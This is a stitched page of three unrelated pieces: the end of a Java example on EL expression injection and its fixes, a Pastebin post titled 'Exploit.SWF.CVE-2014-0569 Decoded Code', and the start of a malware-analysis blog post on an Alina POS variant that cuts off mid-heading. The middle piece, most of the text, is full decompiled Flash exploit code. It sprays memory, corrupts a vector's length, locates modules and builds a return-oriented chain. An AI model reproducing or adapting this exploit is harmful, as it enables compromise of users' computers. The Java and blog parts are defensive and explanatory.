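        public User(String name) { this.name = name; }
        public String getName() { return name; }
    }

    // The pattern the post calls EL3 injection: request text is spliced into the
    // expression source, so the EL parser treats it as code rather than as a value.
    static Object vulnerableGreeting(String untrusted) {
        ELProcessor elp = new ELProcessor();
        return elp.eval("'Welcome ' += " + untrusted);
    }

    // Fix 1: the expression is a constant. Request data reaches the evaluator only
    // as a bean property, so a ';' or '(' inside it is an inert character of a string.
    static String safeGreeting(String untrusted) {
        ELProcessor elp = new ELProcessor();
        elp.defineBean("user", new User(untrusted));
        return String.valueOf(elp.eval("'Welcome ' += user.name"));  // EL 3.0 '+=' concatenates
    }

    // Fix 2: when a parameter must select *which* property is read, it becomes
    // expression text only if it is a plain identifier on a fixed allowlist.
    private static final Pattern IDENTIFIER = Pattern.compile("[a-z][A-Za-z0-9]{0,31}");
    private static final Set<String> ALLOWED_PROPERTIES = new HashSet<>(Arrays.asList("name"));

    static Object safeProperty(User user, String requested) {
        if (requested == null
                || !IDENTIFIER.matcher(requested).matches()
                || !ALLOWED_PROPERTIES.contains(requested)) {
            throw new IllegalArgumentException("property not permitted: " + requested);
        }
        ELProcessor elp = new ELProcessor();
        elp.defineBean("user", user);
        return elp.eval("user." + requested);
    }

    public static void main(String[] args) {
        // Constructed input carrying the semicolon operator the post discusses;
        // passed as data it is simply echoed back inside the greeting.
        String hostile = "Bob; 1 + 1";
        System.out.println(safeGreeting(hostile));                    // Welcome Bob; 1 + 1
        System.out.println(safeProperty(new User("Alice"), "name"));  // Alice
        try {
            safeProperty(new User("Alice"), "name; 1 + 1");          // rejected by the allowlist
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The design point is that both hardened paths leave the evaluator's parse tree fixed at build time: a request can change what a bean property contains, never which EL statements run. The same ELProcessor.eval(String) call that is dangerous with concatenated input is safe when its argument is a literal, and the allowlist check is what a code reviewer or taint-tracking tool should look for wherever request data flows toward eval, importClass or importPackage.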
-
[h=1]Exploit.SWF.CVE-2014-0569 Decoded Code[/h]
By: physicaldrive0 on Dec 18th, 2014
package { import flash.events.*; import flash.media.*; import flash.display.*; import flash.geom.*; import flash.utils.*; import flash.text.*; import flash.external.*; import flash.system.*; import flash.net.*; import __AS3__.vec.*; import avm2.intrinsics.memory.*; public class aeryk extends Sprite { private var mort5:Number; private var slotl:uint; private var larkr:uint = 233495534; private var crux1:uint = 200203949; private var whys3a:uint = 0x0800; private var orlyfx:Vector.<Object>; private var bios2t:Vector.<Object>; private var vola1:Sound; private var pokeg:ByteArray; private var magif:Vector.<Object>; private var rant2p:uint = 0; private var fray6u:Vector.<uint>; private var hugh1:uint; private var rugau8:uint; private var bonom:uint; private var gleeuo:uint; private var wombu3:uint; private var talis0:uint; private var dawnod:uint; private var fund2:uint; private var jump4:uint; private var dipseu:uint; private var buttkk:uint; private var modsj:uint; private var sobsft:uint; public function aeryk(){ var _loc2_ = 0; this.orlyfx = new Vector.<Object>(this.whys3a); this.bios2t = new Vector.<Object>(this.whys3a); this.magif = new Vector.<Object>(this.whys3a); super(); var _loc1_ = this.loaderInfo.parameters.kosoz; if ((((_loc1_ == null)) || (!(this.pawn2c(116, 150))))){ return; }; this.vola1 = new Sound(); this.pokeg = new ByteArray(); this.pokeg.endian = Endian.LITTLE_ENDIAN; this.pokeg.length = 65536; this.birdzu(); try { this.want2d(_loc1_); } catch(error:Error) { return; }; this.pisa8(); try { var _local2 = this.manei(); _loc2_ = _local2; if (_local2 != 0){ this.quodo0(); return; }; this.textline(1, "point4.5"); _local2 = this.grity(); _loc2_ = _local2; if (_local2 != 0){ this.textline(1, "premature exit, 4.5"); this.quodo0(); return; }; if (!(this.midin())){ this.quodo0(); return; }; if (!(this.weilwk())){ this.quodo0(); return; }; _local2 = this.modo55();
_loc2_ = _local2; if (_local2 != 0){ this.quodo0(); return; }; this.gadsi(); this.kahncl(); this.quodo0(); } catch(error:Error) { textline(2, ((("errormsg: " + error.name) + " ") + error.message)); return; }; } public function textline(lnum:uint, text:String):void{ } public function pawn2c(param1:Number, param2:Number):Boolean{ var _loc3_ = Capabilities.version.toLowerCase().split(" "); if (_loc3_[0] != "win"){ return (false); }; this.mort5 = Number(_loc3_[1].substr(0, 4).split(",").join("")); if ((((this.mort5 < param1)) && ((this.mort5 > param2)))){ return (false); }; return (true); } private function birdzu():void{ this.slotl = 0x90909090; } public function hexdump(bytes:ByteArray, start:uint=1, length:uint=0):String{ var byte:int; var output:String = ""; var charbuf:String = ""; if (start == 0){ start = 1; }; if ((((length > bytes.length)) || ((length == 0)))){ length = bytes.length; }; bytes.position = (start - 1); var i:int = start; while (i < (length + 1)) { byte = bytes.readByte(); if ((((byte > 20)) && ((byte < 123)))){ charbuf = (charbuf + String.fromCharCode(byte)); } else { charbuf = (charbuf + "."); }; output = (output + (this.byte2hex(byte) + " ")); if ((i % 16) == 0){ output = (output + (("\t" + charbuf) + "\n")); charbuf = ""; }; i++; }; if ((i % 16) != 0){ while ((i % 16) != 0) { output = (output + " "); i++; }; output = (output + " "); output = (output + (("\t" + charbuf) + "\n")); }; return (output); } public function byte2hex(byte:uint):String{ var hex:String = ""; var arr:String = "FEDCBA"; var i:uint; while (i < 2) { if (((byte & (240 >> (i * 4))) >> (4 - (i * 4))) > 9){ hex = (hex + arr.charAt((15 - ((byte & (240 >> (i * 4))) >> (4 - (i * 4)))))); } else { hex = (hex + String(((byte & (240 >> (i * 4))) >> (4 - (i * 4))))); }; i++; }; return (hex); } private function want2d(param1:String):void{ var _loc4_:uint; var _loc5_:uint; var _loc6_ = 0; var _loc2_ = "_w2fPjM9CaS1b-KWLkcpATG8IuelEJR7ovm3hndqQ5D6XUF0ztgONiyxYrsBV4ZH"; this.pokeg.position 
= 1208; var _loc3_:uint; var n:ByteArray = new ByteArray(); n.length = (param1.length + 1); while (_loc3_ < param1.length) { _loc4_ = 0; _loc5_ = 0; while (_loc5_ < 4) { _loc6_ = _loc2_.indexOf(param1.charAt((_loc3_ + _loc5_))); _loc6_ = (_loc6_ & 63); _loc4_ = (_loc4_ | (_loc6_ << ((3 - _loc5_) * 6))); _loc5_++; }; _loc5_ = 0; while (_loc5_ < 3) { this.pokeg.writeByte(((_loc4_ >> ((2 - _loc5_) * 8)) & 0xFF)); n[(_loc3_ + _loc5_)] = ((_loc4_ >> ((2 - _loc5_) * 8)) & 0xFF); _loc5_++; }; n[(_loc3_ + _loc5_)] = ((_loc4_ >> ((2 - _loc5_) * 8)) & 0xFF); _loc3_ = (_loc3_ + 4); }; this.textline(1, "try hexdump"); this.textline(3, this.hexdump(this.pokeg, 1208, param1.length)); this.textline(1, "try done"); } private function pisa8():void{ var _loc1_:ByteArray; var _loc2_:Vector.<uint>; var _loc3_:uint; _loc3_ = 0; while (_loc3_ < this.whys3a) { this.magif[_loc3_] = new Vector.<Object>(); _loc3_++; }; _loc3_ = 0; while (_loc3_ < this.whys3a) { this.bios2t[_loc3_] = new Vector.<uint>(); _loc3_++; }; _loc3_ = 0; while (_loc3_ < this.whys3a) { _loc2_ = (this.bios2t[_loc3_] as Vector.<uint>); _loc2_.length = 1022; _loc2_[0] = this.crux1; _loc2_[1] = _loc3_; _loc1_ = new ByteArray(); _loc1_.length = 0x1000; _loc1_.endian = Endian.LITTLE_ENDIAN; _loc1_.position = 8; _loc1_.writeUnsignedInt(this.larkr); _loc1_.writeUnsignedInt(_loc3_); this.orlyfx[_loc3_] = _loc1_; _loc3_++; }; } private function manei():uint{ var pos:uint; var _loc2_:uint; var _loc3_:ByteArray; var _loc4_:Vector.<uint>; pos = uint((this.whys3a / 2)); var startpos:uint = pos; while (pos < this.whys3a) { _loc3_ = (this.orlyfx[pos] as ByteArray); ApplicationDomain.currentDomain.domainMemory = _loc3_; _loc3_.atomicCompareAndSwapLength(0x1000, 0); if (casi32(0x1000, 1022, 0x40000001) == 1022){ _loc2_ = (uint((this.whys3a / 2)) - 0x0100); while (_loc2_ < this.whys3a) { _loc4_ = (this.bios2t[_loc2_] as Vector.<uint>); if (_loc4_.length == 0x40000001){ this.fray6u = _loc4_; return (0); }; _loc2_++; }; }; pos++; }; 
return (1); } private function quodo0():void{ if (this.fray6u){ if (((this.bonom) && (this.gleeuo))){ this.sacs1y(this.bonom, this.gleeuo); }; if (this.rugau8){ this.fray6u[1073741823] = this.rugau8; }; this.fray6u[1073741822] = 1022; } else { do { } while (1); }; } public function fullk(param1:uint, param2:uint, param3:uint):uint{ var _loc4_:uint = (param1 >>> (8 * param3)); var _loc5_:uint = (((param3 == 0)) ? 0 : (param2 << ((4 - param3) * 8))); return ((_loc5_ | _loc4_)); } public function intog(param1:uint):uint{ var _loc2_:uint; var _loc3_:uint = (param1 % 4); param1 = (param1 - _loc3_); if (param1 >= this.hugh1){ _loc2_ = (((param1 - this.hugh1) - 8) / 4); } else { _loc2_ = (0x40000000 - (((this.hugh1 + 8) - param1) / 4)); }; var _loc4_:uint = this.fray6u[_loc2_]; if (_loc3_ == 0){ return (_loc4_); }; var _loc5_:uint = this.fray6u[(_loc2_ + 1)]; return (this.fullk(_loc4_, _loc5_, _loc3_)); } public function sacs1y(param1:uint, param2:uint):void{ var _loc3_:uint; if (param1 >= this.hugh1){ _loc3_ = (((param1 - this.hugh1) - 8) / 4); } else { _loc3_ = (0x40000000 - (((this.hugh1 + 8) - param1) / 4)); }; this.fray6u[_loc3_] = param2; } private function boobe():void{ var _loc2_:Vector.<Object>; var _loc1_:uint; while ((((_loc1_ < 30)) && ((this.rant2p < this.whys3a)))) { _loc2_ = (this.magif[this.rant2p] as Vector.<Object>); _loc2_.length = 30; _loc2_[1] = this.vola1; _loc2_[2] = this.pokeg; this.rant2p++; _loc1_++; }; } private function grity():uint{ var _loc1_:uint; var _loc2_:uint; var _loc3_:uint; var _loc4_:ByteArray; var _loc5_:uint; var _loc6_:uint; var _loc7_:uint; _loc1_ = 1; while (_loc1_ < 16) { _loc2_ = (_loc1_ * 0x0400); if (((!(this.hugh1)) && ((this.fray6u[_loc2_] == this.larkr)))){ _loc3_ = this.fray6u[(_loc2_ + 1)]; _loc4_ = (this.orlyfx[_loc3_] as ByteArray); _loc4_.clear(); _loc5_ = 0; while (this.fray6u[_loc2_] == this.larkr) { this.boobe(); if (_loc5_ == 30){ return (5); }; _loc5_++; }; if (((((!((this.fray6u[_loc2_] == this.larkr))) && 
((this.fray6u[(((this.mort5 <= 111)) ? (_loc2_ + 2) : (_loc2_ - 1))] == 128)))) && (!(((_loc6_ = this.fray6u[(_loc2_ + 9)]) == 0))))){ this.hugh1 = ((_loc6_ & 0xFFFFF000) - (_loc1_ * 0x1000)); if (this.hugh1 < 65536){ return (6); }; if ((((((this.intog((_loc6_ + 4)) == 30)) && ((this.intog((_loc6_ + 8)) == 1)))) && ((this.intog((_loc6_ + 20)) == 1)))){ this.bonom = (this.intog((_loc6_ + 12)) & 0xFFFFFFF8); this.gleeuo = this.intog(this.bonom); _loc7_ = (this.intog((_loc6_ + 16)) & 0xFFFFFFF8); if (this.mort5 < 114){ this.wombu3 = this.intog((_loc7_ + 56)); } else { _loc7_ = this.intog((_loc7_ + 64)); this.wombu3 = this.intog((_loc7_ + 8)); }; } else { return (7); }; }; } else { if (((!(this.rugau8)) && ((this.fray6u[_loc2_] == this.crux1)))){ this.rugau8 = this.fray6u[(_loc2_ - 1)]; }; }; if (((this.hugh1) && (this.rugau8))){ return (0); }; _loc1_++; }; if (((!(this.hugh1)) && (!(this.rugau8)))){ return (1); }; if (!(this.hugh1)){ return (2); }; if (!(this.rugau8)){ return (3); }; return (4); } public function midin():Boolean{ var _loc1_:uint = (this.gleeuo & 0xFFFF0000); while ((this.intog(_loc1_) & 0xFFFF) != 23117) { _loc1_ = (_loc1_ - 65536); }; this.talis0 = _loc1_; if (this.talis0){ this.dawnod = (this.talis0 + this.intog((this.talis0 + 60))); if ((this.intog(this.dawnod) & 0xFFFF) == 17744){ return (true); }; }; return (false); } public function weilwk():Boolean{ var _loc3_:uint; var _loc4_:uint; var _loc5_:uint; var _loc6_:uint; var _loc7_:uint; var _loc8_:uint; var _loc1_:uint = this.intog((this.dawnod + 28)); var _loc2_:uint = this.intog((this.dawnod + 44)); if (((_loc1_) && (_loc2_))){ _loc2_ = (_loc2_ + this.talis0); _loc3_ = this.intog(_loc2_); _loc4_ = 4; while (_loc4_ < _loc1_) { _loc5_ = this.intog((_loc2_ + _loc4_)); _loc6_ = 0; while (_loc6_ < 4) { _loc7_ = this.fullk(_loc3_, _loc5_, _loc6_); _loc8_ = (_loc7_ & 0xFFFF); if (((!(this.fund2)) && ((_loc8_ == 50068)))){ this.fund2 = (((_loc2_ + _loc4_) - 4) + _loc6_); }; if (((!(this.jump4)) && 
((_loc8_ == 50009)))){ this.jump4 = (((_loc2_ + _loc4_) - 4) + _loc6_); }; if (((!(this.dipseu)) && ((_loc8_ == 49992)))){ this.dipseu = (((_loc2_ + _loc4_) - 4) + _loc6_); }; if (((!(this.modsj)) && ((_loc8_ == 50000)))){ this.modsj = (((_loc2_ + _loc4_) - 4) + _loc6_); }; if (((!(this.buttkk)) && ((_loc7_ == 3277654153)))){ this.buttkk = (((_loc2_ + _loc4_) - 4) + _loc6_); }; _loc6_++; }; _loc3_ = _loc5_; if (((((((((this.fund2) && (this.jump4))) && (this.dipseu))) && (this.buttkk))) && (this.modsj))){ return (true); }; _loc4_ = (_loc4_ + 4); }; }; return (false); } public function modo55():uint{ var _loc2_:uint; var _loc3_:uint; var _loc4_:uint; var _loc5_:uint; var _loc6_:uint; var _loc7_:uint; var _loc1_:uint = (this.talis0 + this.intog((this.dawnod + 128))); while (true) { _loc2_ = this.intog(_loc1_); if (_loc2_ == 0){ break; }; _loc3_ = (this.talis0 + this.intog((_loc1_ + 12))); if (((((this.intog(_loc3_) & 1314014539) == 1314014539)) && (((this.intog((_loc3_ + 4)) & 842222661) == 842222661)))){ _loc4_ = 0; _loc2_ = (_loc2_ + this.talis0); while (true) { _loc5_ = this.intog(_loc2_); if (_loc5_ == 0){ break; }; _loc6_ = ((this.talis0 + _loc5_) + 2); if ((((((this.intog(_loc6_) == 1953655126)) && ((this.intog((_loc6_ + 4)) == 1097621877)))) && ((this.intog((_loc6_ + 8)) == 1668246636)))){ _loc7_ = (this.talis0 + this.intog((_loc1_ + 16))); this.sobsft = this.intog((_loc7_ + (_loc4_ * 4))); return ((((this.sobsft == 0)) ? 
4 : 0)); }; _loc2_ = (_loc2_ + 4); _loc4_++; }; return (3); }; _loc1_ = (_loc1_ + 20); }; return (2); } private function gadsi():void{ this.pokeg.position = 0; var _loc1_:uint; while (_loc1_ < 27) { this.pokeg.writeUnsignedInt((this.jump4 + 1)); _loc1_++; }; this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.fund2); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.modsj); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.slotl); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt((this.wombu3 + 1208)); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(this.buttkk); 
this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(276335968); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.modsj); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(3242323591); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.buttkk); 
this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(3271837833); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.modsj); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(833423561); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.buttkk); 
this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(3272099977); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.modsj); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(4134906824); this.pokeg.writeUnsignedInt(this.buttkk); 
this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(3272362121); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(64); this.pokeg.writeUnsignedInt(this.buttkk); 
this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(0x1000); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(0x1000); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(0); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt((this.jump4 + 1)); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.sobsft); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.fund2); } private function kahncl():void{ this.sacs1y(this.bonom, this.wombu3); new Number(this.vola1.toString()); } } }//package
Source: Exploit.SWF.CVE-2014-0569 Decoded Code - Pastebin.com
-
Alina POS malware "sparks" off a new variant

Alina is a well-documented family of malware used to scrape Credit Card (CC) data from Point of Sale (POS) software. We published a series of in-depth write-ups on the capabilities Alina possesses as well as the progression of the versions. Xylitol has a nice write-up on the Command and Control (C&C) aspects of Alina. In this blog post I'd like to discuss a variant that first cropped up in late 2013 and has been seen in the wild as recently as a month ago. Some anti-virus companies have identified similar samples as JackPOS, but there are several interesting behavior differences that haven't been posted about in any other write-ups. It is clear that Alina, JackPOS, and this variant all bear close resemblances to each other, but there are behavioral differences that distinguish this version from the others which I have not seen detailed elsewhere. For the purposes of this write-up I will be referring to this variant as Spark.

AutoIt Staged Loader

The first and most interesting difference between Alina and Spark is that several of the samples have been found embedded in a compiled AutoIt script, which then loads the malware into memory. Both Security Affairs and Security Intelligence posted about a similar type of AutoIt compiled script being used as a loader with a JackPOS binary instead of Spark here and here, but did not provide many details. We will take a closer look at how the loader works. AutoIt "is a freeware BASIC-like scripting language designed for automating the Windows GUI and general scripting". This AutoIt script contains functions to allocate space in memory, map a binary into that memory, fix the relocations and Import Address Table, and execute the binary. A malicious binary is concatenated into a variable 4,000 bytes at a time and the script's functions are used to load and execute it.

The script is converted into a Windows executable by running the utility Aut2Exe, which produces a new binary with the malware inside it.

Figure 1: Compiling an AutoIt Script

Converting a script into an executable is a normal and useful part of AutoIt's functionality. I used a third party utility called Exe2Aut to recover the original script and retrieve the binary.

Figure 2: Decompiling an AutoIt Script

The use of AutoIt as a loader is an interesting tactic. We typically see malware authors writing a script to execute another binary on the system or perform some function needed to accomplish the dastardly deed the author set out to do. This script is then compiled using Aut2exe for AutoIt, py2exe for python, or perl2exe for perl. These programs include their respective interpreters in the compiled binary for executing the script and are generally considered to be unsophisticated malware. In this case, however, the script has a binary in a variable that is loaded into dynamic memory and fixes up all the addresses required for execution. This is a much more advanced technique and is reusable with different embedded binaries. Like all such loaders, this one initially obfuscates artifacts such as strings and import tables from the malicious binary.

Startup

